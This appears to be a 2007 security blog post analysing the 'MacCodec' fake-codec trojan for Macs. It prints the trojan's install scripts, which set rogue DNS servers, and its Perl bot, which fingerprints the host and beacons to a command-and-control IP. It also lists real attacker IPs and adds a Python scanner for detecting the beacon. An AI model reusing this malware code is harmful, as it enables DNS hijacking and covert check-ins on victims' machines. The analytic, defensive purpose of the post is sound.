Thursday, November 01, 2007

Mac Codec Trojan

Sunbelt is reporting about a codec style trojan targeted towards Mac users.

Alex from Sunbelt was kind enough to provide several researchers (and me) with links to this trojan. It appears that depending on your user agent (either Mac or Windows) you will be served a different version of the binary. We will not be linking to the binary at this time, and I will be focused on the Mac version, since that is the one getting all the attention.

The package is titled MacCodec, and does require your administrator password to mount. The default install location is /Library/Internet Plug-Ins/ and it comes with a pretty license agreement:

SOFTWARE INSTALLATION: Components bundled with our software may report to Licensor and/or its affiliates the installation status of certain marketing offers, such as toolbars, and also generalized installation information, such as language preference and operating system version, to assist Licensor in its product development. No personal information will be communicated to Licensor or its affiliates during this process. Licensor reserves the right to install additional components through its check/update system. These components could include Toolbar, Pop-up advertising solution, Commercial homepage manager, Commercial messenger and could modify some of your network settings.
PreInstall Script:
#!/bin/bash
s1=85.255.116.156
s2=85.255.112.15
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')
PostInstall Script:
#!/bin/sh
path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"
Well commented perl bot:
#!/usr/bin/perl
use IO::Socket;

# Pure-Perl base64 encoder copied from MIME::Base64; the only comments in the
# bot are the ones that came with it.
sub encode_base64 ($;$)
{
    if ($] >= 5.006) {
        require bytes;
        if (bytes::length($_[0]) > length($_[0]) ||
            ($] >= 5.008 && $_[0] =~ /[^\0-\xFF]/))
        {
            require Carp;
            Carp::croak("The Base64 encoding is only defined for bytes");
        }
    }
    use integer;
    my $eol = $_[1];
    $eol = "\n" unless defined $eol;
    my $res = pack("u", $_[0]);
    # Remove first character of each line, remove newlines
    $res =~ s/^.//mg;
    $res =~ s/\n//g;
    $res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
    # fix padding at the end
    my $padding = (3 - length($_[0]) % 3) % 3;
    $res =~ s/.{$padding}$/'=' x $padding/e if $padding;
    # break encoded string into lines of no more than 76 characters each
    if (length $eol) {
        $res =~ s/(.{1,76})/$1$eol/g;
    }
    return $res;
}

# C&C check-in: fingerprint the host and send it base64-encoded in an
# Accept-Language header (a signature worth looking for in proxy logs).
my $server="85.255.121.37";
my $cmd=`uname -p;echo ";";hostname`; # "<cpu>;<hostname>" once newlines are stripped
$cmd=~s/\n//g;
my $uniqid=encode_base64("mac;".$cmd);
$uniqid=~s/\n//g;
my $request="GET / HTTP/1.1\r\nAccept-Language: $uniqid\r\nHost: $server\r\n\r\n";
my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;
close($socket);

So, this Trojan requires the user to enter their password for install, which probably won't seem suspicious to the unsuspecting user, since a lot of software requires an administrator password to install. It then changes the DNS entries to 85.255.116.156 and 85.255.112.15, and attempts to make contact with an HTTP-based C&C at 85.255.121.37. You might want to think twice about installing suspicious looking codecs - porn just isn't that good.

The DNS servers point every invalid query (and probably a few valid porn sites) to 216.255.187.215, which Bleeding Edge recommends you block.
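An added defender-side example, not code from the post or from the trojan: a small Python scanner that recognises the check-in described above (the base64 host fingerprint in the Accept-Language header sent to 85.255.121.37) and checks a resolver list against the two DNS-changer addresses. The sample request and hostname are constructed, not captured.

```python
import base64
import binascii
import re

# Indicators quoted in the post; the request and hostname below are constructed.
ROGUE_DNS = {"85.255.116.156", "85.255.112.15"}
CNC_HOST = "85.255.121.37"
# A legitimate Accept-Language value is a list of tags such as "en-US,en;q=0.8".
LANG_TAG_RE = re.compile(r"^[A-Za-z]{1,8}(-[A-Za-z0-9]{1,8})*(;q=[01](\.\d{1,3})?)?$")

def decode_beacon(accept_language):
    """Return (platform, cpu, hostname) when the header carries the bot's
    base64 fingerprint "mac;<uname -p>;<hostname>", otherwise None."""
    if all(LANG_TAG_RE.match(t.strip()) for t in accept_language.split(",")):
        return None  # genuine language list, nothing to decode
    try:
        raw = base64.b64decode(accept_language, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    parts = raw.split(";")
    if len(parts) != 3 or parts[0] != "mac":
        return None
    return tuple(parts)

def scan_http_request(request):
    """Parse one raw HTTP request; flag the C&C host and any decoded beacon."""
    head = request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {
        "host_is_cnc": headers.get("host") == CNC_HOST,
        "beacon": decode_beacon(headers["accept-language"])
                  if "accept-language" in headers else None,
    }

def rogue_resolvers(resolvers):
    """Return the configured resolvers that match the DNS-changer IPs."""
    return sorted(set(resolvers) & ROGUE_DNS)

# Constructed sample: what the Perl bot would send from a hypothetical host.
SAMPLE_FINGERPRINT = base64.b64encode(b"mac;i386;victims-macbook.local").decode()
BEACON_REQUEST = ("GET / HTTP/1.1\r\nAccept-Language: " + SAMPLE_FINGERPRINT
                  + "\r\nHost: " + CNC_HOST + "\r\n\r\n")
BENIGN_REQUEST = "GET / HTTP/1.1\r\nAccept-Language: en-US,en;q=0.8\r\nHost: example.com\r\n\r\n"
```

Run `scan_http_request` over each request body in a proxy capture and `rogue_resolvers` over the output of `scutil --dns` or the resolver list from System Preferences.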

As expected, this is getting all sorts of attention from ISC. It's also sparked the Mac lovers vs. haters debate on several forums. It really isn't all that special, just a Perl script packed in a dmg file. Perl bots have worked on Macs for ages now. While the thought of infecting a Mac or Linux box is sexy, this is hardly news. With that said, I do like the public attention Macs are getting with regards to security. Regardless of operating system, users should remain on guard and prepared to use their common sense at all times.
